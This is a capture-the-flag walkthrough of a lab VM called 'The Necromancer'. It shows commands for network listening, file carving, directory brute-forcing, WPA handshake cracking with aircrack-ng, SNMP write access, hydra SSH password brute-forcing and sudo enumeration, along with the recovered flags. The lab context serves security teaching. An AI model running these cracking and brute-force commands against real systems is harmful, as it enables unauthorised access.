After hearing Xerubus talk about his new CTF VM, I thought I might download it and have a go. As it turns out, it is one of the best capture-the-flag virtual machines I have come across in some time. It has a good mix of both skills and difficulties.

Flag 1

After finding the IP address of the new VM image, 10.0.2.11, I ran Nmap, which showed no results. Weird. Next, Wireshark with the filter ip.src==10.0.2.11 showed the VM trying to connect out to port 4444, so I listened there:

nc -lvp 4444
listening on [any] 4444 ...
10.0.2.11: inverse host lookup failed: Unknown host
connect to [10.0.2.4] from (UNKNOWN) [10.0.2.11] 2006

The received data, base64 decoded:

Welcome!

You find yourself staring towards the horizon, with nothing but silence surrounding you.
You look east, then south, then west, all you can see is a great wasteland of nothingness.

Turning to your north you notice a small flicker of light in the distance.
You walk north towards the flicker of light, only to be stopped by some type of invisible barrier.

The air around you begins to get thicker, and your heart begins to beat against your chest.
You turn to your left.. then to your right!  You are trapped!

You fumble through your pockets.. nothing!
You look down and see you are standing in sand.
Dropping to your knees you begin to dig frantically.

As you dig you notice the barrier extends underground!
Frantically you keep digging and digging until your nails suddenly catch on an object.

You dig further and discover a small wooden box.
flag1{e6078b9b1aac915d11b9fd59791030bf} is engraved on the lid.

You open the box, and find a parchment with the following written on it. "Chant the string of flag1 - u666"


Great, we have the first flag and the hint for the next flag.

Flag 2

Figuring that “Chant the string of flag1 - u666” meant UDP port 666, I connected to the server on UDP port 666 using “nc -u 10.0.2.11 666” and sent the decoded flag1{e6078b9b1aac915d11b9fd59791030bf} as the open sesame.

The server returns:

A loud crack of thunder sounds as you are knocked to your feet!

Dazed, you start to feel fresh air entering your lungs.

You are free!

In front of you written in the sand are the words:

flag2{c39cd4df8f2e35d20d92c2e44de5f7c6}

As you stand to your feet you notice that you can no longer see the flicker of light in the distance.

You turn frantically looking in all directions until suddenly, a murder of crows appear on the horizon.

As they get closer you can see one of the crows is grasping on to an object. As the sun hits the object, shards of light beam from its surface.

The birds get closer, and closer, and closer.

Staring up at the crows you can see they are in a formation.

Squinting your eyes from the light coming from the object, you can see the formation looks like the numeral 80.

As quickly as the birds appeared, they have left you once again.... alone... tortured by the deafening sound of silence.

666 is closed.

This has opened up port 80 and closed port 666.

Flag 3

Visiting port 80 in the web browser, I see:

Hours have passed since you first started to follow the crows.

Silence continues to engulf you as you trek towards a mountain range on the horizon.

More time passes and you are now standing in front of a great chasm.

Across the chasm you can see a necromancer standing in the mouth of a cave, staring skyward at the circling crows.

As you step closer to the chasm, a rock dislodges from beneath your feet and falls into the dark depths.

The necromancer looks towards you with hollow eyes which can only be described as death.

He smirks in your direction, and suddenly a bright light momentarily blinds you.

The silence is broken by a blood curdling screech of a thousand birds, followed by the necromancer's laughs fading as he descends into the cave!

The crows break their formation, some flying aimlessly in the air; others now motionless upon the ground.

The cave is now protected by a gaseous blue haze, and an organised pile of feathers lay before you.

image

Image copyright: Chris Maynard

Guessing that “organised pile of feathers lay before you” was hinting at the feather image called “pileoffeathers.jpg”, I ran “foremost ./pileoffeathers.jpg” and got a zip file. The extracted zip file contained feathers.txt, which held “ZmxhZzN7OWFkM2Y2MmRiN2I5MWMyOGI2ODEzNzAwMDM5NDYzOWZ9IC0gQ3Jvc3MgdGhlIGNoYXNtIGF0IC9hbWFnaWNicmlkZ2VhcHBlYXJzYXR0aGVjaGFzbQ==”

Base64 decoded to:

flag3{9ad3f62db7b91c28b68137000394639f} - Cross the chasm at /amagicbridgeappearsatthechasm
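What foremost did in the step above, as an added example that is not from the original write-up: a small carver that finds a zip archive appended after a JPEG's end-of-image marker, pulls its members out, base64-decodes them and extracts the flag. The JPEG bytes are a constructed stand-in for pileoffeathers.jpg; the base64 text is the one found in feathers.txt on the page.

```python
import base64
import io
import re
import zipfile

# Base64 text found in feathers.txt on the page (split only for line length)
FEATHERS_B64 = (b"ZmxhZzN7OWFkM2Y2MmRiN2I5MWMyOGI2ODEzNzAwMDM5NDYzOWZ9IC0gQ3Jvc3Mg"
                b"dGhlIGNoYXNtIGF0IC9hbWFnaWNicmlkZ2VhcHBlYXJzYXR0aGVjaGFzbQ==")

ZIP_LOCAL_HEADER = b"PK\x03\x04"   # start of the first zip entry
ZIP_EOCD = b"PK\x05\x06"           # end-of-central-directory record
FLAG_RE = re.compile(rb"flag\d+\{[0-9a-f]{32}\}")


def build_sample_image():
    """Constructed stand-in for pileoffeathers.jpg: a JPEG header, the
    end-of-image marker FF D9, then a zip holding feathers.txt glued on."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("feathers.txt", FEATHERS_B64)
    fake_jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16 + b"\xff\xd9"
    return fake_jpeg + buf.getvalue()


def carve_zips(data):
    """Return each zip archive embedded in data, by signature (what foremost does)."""
    found, pos = [], 0
    while True:
        start = data.find(ZIP_LOCAL_HEADER, pos)
        eocd = data.find(ZIP_EOCD, start) if start != -1 else -1
        if eocd == -1:
            return found
        # EOCD is 22 bytes plus an optional comment whose length is the
        # little-endian u16 at offset 20 of the record
        comment_len = int.from_bytes(data[eocd + 20:eocd + 22], "little")
        end = eocd + 22 + comment_len
        found.append(data[start:end])
        pos = end


def flags_from_image(data):
    """Carve zips, base64-decode every member that is valid base64, grep flags."""
    flags = []
    for blob in carve_zips(data):
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            for name in zf.namelist():
                raw = zf.read(name)
                try:
                    text = base64.b64decode(raw, validate=True)
                except ValueError:   # not base64: search the raw bytes instead
                    text = raw
                flags += [m.decode() for m in FLAG_RE.findall(text)]
    return flags


if __name__ == "__main__":
    print(flags_from_image(build_sample_image()))
```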

Flag 4

Since it started with a slash it was a safe bet it is a URL: http://10.0.2.11/amagicbridgeappearsatthechasm/

You cautiously make your way across chasm.

You are standing on a snow covered plateau, surrounded by shear cliffs of ice and stone.

The cave before you is protected by some sort of spell cast by the necromancer.

You reach out to touch the gaseous blue haze, and can feel life being drawn from your soul the closer you get.

Hastily you take a few steps back away from the cave entrance.

There must be a magical item that could protect you from the necromancer's spell.

image

I created a word list of all magical items, replacing spaces with _ and -. No success.

Then I extracted all unique words from the same list and ran dirb again…
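The two wordlist passes described above, as an added example (not the author's script): joined item names with spaces turned into _, - or nothing, then the set of unique words with filler words dropped. The item list here is a constructed sample; the author's full list is not on the page.

```python
import re

# Constructed sample of a "magical items" list (the real list is much larger)
MAGIC_ITEMS = [
    "Ring of Protection",
    "Talisman",
    "Amulet of Life Saving",
    "Staff of the Necromancer",
    "Cloak of Invisibility",
]

# Filler words that never make useful directory names on their own
STOPWORDS = {"of", "the", "a", "an"}


def item_variants(item):
    """First pass: one item name joined with _, with -, and with nothing."""
    joined = " ".join(item.lower().split())
    return {joined.replace(" ", "_"),
            joined.replace(" ", "-"),
            joined.replace(" ", "")}


def unique_words(items):
    """Second pass: every distinct word across the list, minus STOPWORDS."""
    words = set()
    for item in items:
        for w in re.findall(r"[a-z0-9]+", item.lower()):
            if w not in STOPWORDS:
                words.add(w)
    return words


def build_wordlist(items, include_words=True):
    """Sorted candidate list for dirb; include_words adds the single-word pass."""
    candidates = set()
    for item in items:
        candidates |= item_variants(item)
    if include_words:
        candidates |= unique_words(items)
    return sorted(candidates)


if __name__ == "__main__":
    # Write one candidate per line, the format dirb expects for a wordlist file
    print("\n".join(build_wordlist(MAGIC_ITEMS)))
```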

~/Desktop/magic_items# dirb http://10.0.2.11/amagicbridgeappearsatthechasm ./words3.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Jul 14 23:22:25 2016
URL_BASE: http://10.0.2.11/amagicbridgeappearsatthechasm/
WORDLIST_FILES: ./words3.txt

-----------------

GENERATED WORDS: 1683

---- Scanning URL: http://10.0.2.11/amagicbridgeappearsatthechasm/ ----
+ http://10.0.2.11/amagicbridgeappearsatthechasm/talisman (CODE:200|SIZE:9676)

-----------------
END_TIME: Thu Jul 14 23:22:27 2016
DOWNLOADED: 1683 - FOUND: 1

~/Desktop# wget http://10.0.2.11/amagicbridgeappearsatthechasm/talisman

~/Desktop# file talisman
talisman: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=2b131df906087adf163f8cba1967b3d2766e639d, not stripped

The file is obviously a Linux executable.

~/Desktop# chmod +x ./talisman
~/Desktop# ./talisman
You have found a talisman.
The talisman is cold to the touch, and has no words or symbols on its surface.
Do you want to wear the talisman? yes
>Nothing happens.

Sending 100 "a" characters instead gets a "Segmentation fault".

Time for a buffer overflow.

Some gdb magic to get to the “chantToBreakSpell” function gives:

You fall to your knees.. weak and weary.
Looking up you can see the spell is still protecting the cave entrance.
The talisman is now almost too hot to touch!
Turning it over you see words now etched into the surface:
flag4{ea50536158db50247e110a6c89fcf3d3}
Chant these words at u31337

Flag 5

“Chant these words at u31337” sounds like a similar clue. So off to UDP port 31337.

:~/Desktop# nc -u 10.0.2.11 31337
flag4{ea50536158db50247e110a6c89fcf3d3}Nothing happens.
ea50536158db50247e110a6c89fcf3d3Nothing happens.

Time to check whether that flag is a hash. Looking up ea50536158db50247e110a6c89fcf3d3 on crackstation.net returns: blackmagic. Sending “blackmagic” instead:

As you chant the words, a hissing sound echoes from the ice walls.

The blue aura disappears from the cave entrance.

You enter the cave and see that it is dimly lit by torches; shadows dancing against the rock wall as you descend deeper and deeper into the mountain.

You hear high pitched screeches coming from within the cave, and you start to feel a gentle breeze.

The screeches are getting closer, and with it the breeze begins to turn into an ice cold wind.

Suddenly, you are attacked by a swarm of bats!

You aimlessly thrash at the air in front of you!

The bats continue their relentless attack, until.... silence.

Looking around you see no sign of any bats, and no indication of the struggle which had just occurred.

Looking towards one of the torches, you see something on the cave wall.

You walk closer, and notice a pile of mutilated bats lying on the cave floor.  Above them, a word etched in blood on the wall.

/thenecromancerwillabsorbyoursoul

flag5{0766c36577af58e15545f099a3b15e60}

Flag 6

Back to the web browser at http://10.0.2.11/thenecromancerwillabsorbyoursoul/

flag6{b1c3ed8f1db4258e4dcb0ce565f6dc03}

You continue to make your way through the cave.

In the distance you can see a familiar flicker of light moving in and out of the shadows.

As you get closer to the light you can hear faint footsteps, followed by the sound of a heavy door opening.

You move closer, and then stop frozen with fear.

It's the necromancer!

image
Image copyright: Manzanedo

Again he stares at you with deathly hollow eyes.

He is standing in a doorway; a staff in one hand, and an object in the other.

Smirking, the necromancer holds the staff and the object in the air.

He points his staff in your direction, and the stench of death and decay begins to fill the air.

You stare into his eyes and then.......

...... darkness. You open your eyes and find yourself lying on the damp floor of the cave.

The amulet must have saved you from whatever spell the necromancer had cast.

You stand to your feet. Behind you, only darkness.

Before you, a large door with the symbol of a skull engraved into the surface.

Looking closer at the skull, you can see u161 engraved into the forehead.

I noticed an interesting link in that HTML page:

~/Desktop# wget http://10.0.2.11/thenecromancerwillabsorbyoursoul/necromancer

~/Desktop# file necromancer
necromancer: bzip2 compressed data, block size = 900k

The decompressed file starts with “necromancer.cap”, so it is a tar archive.

Flag 7

tar -xjvf ./necromancer

Opening necromancer.cap in Wireshark shows WiFi traffic for the SSID “community”.

aircrack-ng ./necromancer.cap -w /usr/share/wordlists/rockyou.txt

password: death2all

There is no other useful traffic in the capture. The skull said u161, and UDP 161 is SNMP, so an SSID of “community” with the password death2all reads as an SNMP community string:

~/Desktop# snmpwalk 10.0.2.11 -c death2all -v1
Created directory: /var/lib/snmp/mib_indexes
iso.3.6.1.2.1.1.1.0 = STRING: "You stand in front of a door."
iso.3.6.1.2.1.1.4.0 = STRING: "The door is Locked. If you choose to defeat me, the door must be Unlocked."
iso.3.6.1.2.1.1.5.0 = STRING: "Fear the Necromancer!"
iso.3.6.1.2.1.1.6.0 = STRING: "Locked - death2allrw!"

root@windows2:~/Desktop# snmpget -v 1 -c death2allrw 10.0.2.11 iso.3.6.1.2.1.1.6.0
iso.3.6.1.2.1.1.6.0 = STRING: "Locked - death2allrw!"
root@windows2:~/Desktop# snmpset -v 1 -c death2allrw 10.0.2.11 iso.3.6.1.2.1.1.6.0 "Unlocked"
iso.3.6.1.2.1.1.6.0: Needs value
root@windows2:~/Desktop# snmpset -v 1 -c death2allrw 10.0.2.11 iso.3.6.1.2.1.1.6.0 s "Unlocked"
iso.3.6.1.2.1.1.6.0 = STRING: "Unlocked"
root@windows2:~/Desktop# snmpwalk 10.0.2.11 -c death2all -v1
iso.3.6.1.2.1.1.1.0 = STRING: "You stand in front of a door."
iso.3.6.1.2.1.1.4.0 = STRING: "The door is unlocked! You may now enter the Necromancer's lair!"
iso.3.6.1.2.1.1.5.0 = STRING: "Fear the Necromancer!"
iso.3.6.1.2.1.1.6.0 = STRING: "flag7{9e5494108d10bbd5f9e7ae52239546c4} - t22"
End of MIB

Flag 8,9,10


The flag7 hash 9e5494108d10bbd5f9e7ae52239546c4 decrypts with crackstation to “demonslayer”, and t22 is probably TCP port 22 (ssh?).

~/Desktop# hydra -l demonslayer -P /usr/share/wordlists/rockyou.txt 10.0.2.11 ssh
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-07-15 00:40:21
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 64 tasks, 14344400 login tries (l:1/p:14344400), ~14008 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 10.0.2.11   login: demonslayer   password: 12345678
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-07-15 00:40:24

Great! Now we can login with SSH.

ssh demonslayer@10.0.2.11
12345678

.                                                      .
.n                   .                 .                  n.
.   .dP                  dP                   9b                 9b.    .
4    qXb         .       dX                     Xb       .        dXp     t
dX.    9Xb      .dXb    __                         __    dXb.     dXP     .Xb
9XXb._       _.dXXXXb dXXXXbo.                 .odXXXXb dXXXXb._       _.dXXP
9XXXXXXXXXXXXXXXXXXXVXXXXXXXXOo.           .oOXXXXXXXXVXXXXXXXXXXXXXXXXXXXP
`9XXXXXXXXXXXXXXXXXXXXX'~   ~`OOO8b   d8OOO'~   ~`XXXXXXXXXXXXXXXXXXXXXP'
`9XXXXXXXXXXXP' `9XX'          `98v8P'          `XXP' `9XXXXXXXXXXXP'
~~~~~~~       9X.          .db|db.          .XP       ~~~~~~~
)b.  .dbo.dP'`v'`9b.odb.  .dX(
,dXXXXXXXXXXXb     dXXXXXXXXXXXb.
dXXXXXXXXXXXP'   .   `9XXXXXXXXXXXb
dXXXXXXXXXXXXb   d|b   dXXXXXXXXXXXXb
9XXb'   `XXXXXb.dX|Xb.dXXXXX'   `dXXP
`'      9XXXXXX(   )XXXXXXP      `'
XXXX X.`v'.X XXXX
XP^X'`b   d'`X^XX
X. 9  `   '  P )X
`b  `       '  d'
`             '
THE NECROMANCER!
by  @xerubus

$ ls -lah
total 40
drwxr-xr-x  3 demonslayer  demonslayer   512B Jun 23 05:38 .
drwxr-xr-x  3 root         wheel         512B May 11 18:25 ..
-rw-r--r--  1 demonslayer  demonslayer    87B May 11 18:25 .Xdefaults
-rw-r--r--  1 demonslayer  demonslayer   773B May 11 18:25 .cshrc
-rw-r--r--  1 demonslayer  demonslayer   103B May 11 18:25 .cvsrc
-rw-r--r--  1 demonslayer  demonslayer   359B May 11 18:25 .login
-rw-r--r--  1 demonslayer  demonslayer   175B May 11 18:25 .mailrc
-rw-r--r--  1 demonslayer  demonslayer   218B May 11 18:25 .profile
drwx------  2 demonslayer  demonslayer   512B May 11 18:25 .ssh
-rw-r--r--  1 demonslayer  demonslayer   706B May 11 21:19 flag8.txt

cat flag8.txt

You enter the Necromancer's Lair!

A stench of decay fills this place.

Jars filled with parts of creatures litter the bookshelves.

A fire with flames of green burns coldly in the distance.

Standing in the middle of the room with his back to you is the Necromancer.

In front of him lies a corpse, indistinguishable from any living creature you have seen before.

He holds a staff in one hand, and the flickering object in the other.

"You are a fool to follow me here!  Do you not know who I am!"

The necromancer turns to face you.  Dark words fill the air!

"You are damned already my friend.  Now prepare for your own death!"

Defend yourself!  Counter attack the Necromancer's spells at u777!

nc -u localhost 777

** You only have 3 hitpoints left! **

Defend yourself from the Necromancer's Spells!

Where do the Black Robes practice magic of the Greater Path?  Kelewan

flag8{55a6af2ca3fee9f2fef81d20743bda2c}

** You only have 2 hitpoints left! **

Defend yourself from the Necromancer's Spells!

Who did Johann Faust VIII make a deal with? Mephistopheles

flag9{713587e17e796209d1df4c9c2c2d2966}

** You only have 2 hitpoints left! **

Defend yourself from the Necromancer's Spells!

Who is tricked into passing the Ninth Gate?  Hedge

flag10{8dc6486d2c63cafcdc6efbba2be98ee4}

A great flash of light knocks you to the ground; momentarily blinding you!

As your sight begins to return, you can see a thick black cloud of smoke lingering where the Necromancer once stood.

An evil laugh echoes in the room and the black cloud begins to disappear into the cracks in the floor.

The room is silent.

You walk over to where the Necromancer once stood.

On the ground is a small vile.

Flag 11

$ ls -lah
total 44
drwxr-xr-x  3 demonslayer  demonslayer   512B Jul 15 10:47 .
drwxr-xr-x  3 root         wheel         512B May 11 18:25 ..
-rw-r--r--  1 demonslayer  demonslayer    87B May 11 18:25 .Xdefaults
-rw-r--r--  1 demonslayer  demonslayer   773B May 11 18:25 .cshrc
-rw-r--r--  1 demonslayer  demonslayer   103B May 11 18:25 .cvsrc
-rw-r--r--  1 demonslayer  demonslayer   359B May 11 18:25 .login
-rw-r--r--  1 demonslayer  demonslayer   175B May 11 18:25 .mailrc
-rw-r--r--  1 demonslayer  demonslayer   218B May 11 18:25 .profile
-rw-r--r--  1 demonslayer  demonslayer   196B Jul 15 10:47 .smallvile
drwx------  2 demonslayer  demonslayer   512B May 11 18:25 .ssh
-rw-r--r--  1 demonslayer  demonslayer   706B May 11 21:19 flag8.txt
$ cat .smallvile

You pick up the small vile.

Inside of it you can see a green liquid.

Opening the vile releases a pleasant odour into the air.

You drink the elixir and feel a great power within your veins!

$ sudo -l
Matching Defaults entries for demonslayer on thenecromancer:
    env_keep+="FTPMODE PKG_CACHE PKG_PATH SM_PATH SSH_AUTH_SOCK"

User demonslayer may run the following commands on thenecromancer:
    (ALL) NOPASSWD: /bin/cat /root/flag11.txt
$ sudo cat /root/flag11.txt

Suddenly you feel dizzy and fall to the ground!

As you open your eyes you find yourself staring at a computer screen.

Congratulations!!! You have conquered......

.                                                      .
.n                   .                 .                  n.
.   .dP                  dP                   9b                 9b.    .
4    qXb         .       dX                     Xb       .        dXp     t
dX.    9Xb      .dXb    __                         __    dXb.     dXP     .Xb
9XXb._       _.dXXXXb dXXXXbo.                 .odXXXXb dXXXXb._       _.dXXP
9XXXXXXXXXXXXXXXXXXXVXXXXXXXXOo.           .oOXXXXXXXXVXXXXXXXXXXXXXXXXXXXP
`9XXXXXXXXXXXXXXXXXXXXX'~   ~`OOO8b   d8OOO'~   ~`XXXXXXXXXXXXXXXXXXXXXP'
`9XXXXXXXXXXXP' `9XX'          `98v8P'          `XXP' `9XXXXXXXXXXXP'
~~~~~~~       9X.          .db|db.          .XP       ~~~~~~~
)b.  .dbo.dP'`v'`9b.odb.  .dX(
,dXXXXXXXXXXXb     dXXXXXXXXXXXb.
dXXXXXXXXXXXP'   .   `9XXXXXXXXXXXb
dXXXXXXXXXXXXb   d|b   dXXXXXXXXXXXXb
9XXb'   `XXXXXb.dX|Xb.dXXXXX'   `dXXP
`'      9XXXXXX(   )XXXXXXP      `'
XXXX X.`v'.X XXXX
XP^X'`b   d'`X^XX
X. 9  `   '  P )X
`b  `       '  d'
`             '
THE NECROMANCER!
by  @xerubus

flag11{42c35828545b926e79a36493938ab1b1}

Big shout out to Dook and Bull for being test bunnies.

Cheers OJ for the obfuscation help.

Thanks to SecTalks Brisbane and their sponsors for making these CTF challenges possible.

"========================================="
"  xerubus (@xerubus) - www.mogozobo.com  "
"========================================="